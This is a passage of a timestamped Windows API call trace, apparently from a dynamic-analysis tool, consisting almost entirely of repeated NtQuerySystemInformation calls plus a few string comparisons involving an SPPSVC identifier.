SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0283.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0283.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0283.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0283.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0283.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0283.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0283.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0283.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9d0, Length=0x20, ResultLength=0x0) [0283.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9d0, Length=0x20, ResultLength=0x0) [0283.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf38, Length=0x50, ResultLength=0x0) [0283.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0283.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0283.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0283.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0283.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0283.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0283.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0283.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x28, ResultLength=0x0) [0283.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x28, ResultLength=0x0) [0283.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0283.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x20, ResultLength=0x0) [0283.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0283.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x20, ResultLength=0x0) [0283.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0283.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0283.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0283.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0283.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0283.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.678] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc8, Length=0x50, ResultLength=0x0) [0283.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0283.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0283.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0283.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0283.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0283.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0283.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d050, Length=0x28, ResultLength=0x0) [0283.690] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0283.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0283.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.691] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.692] 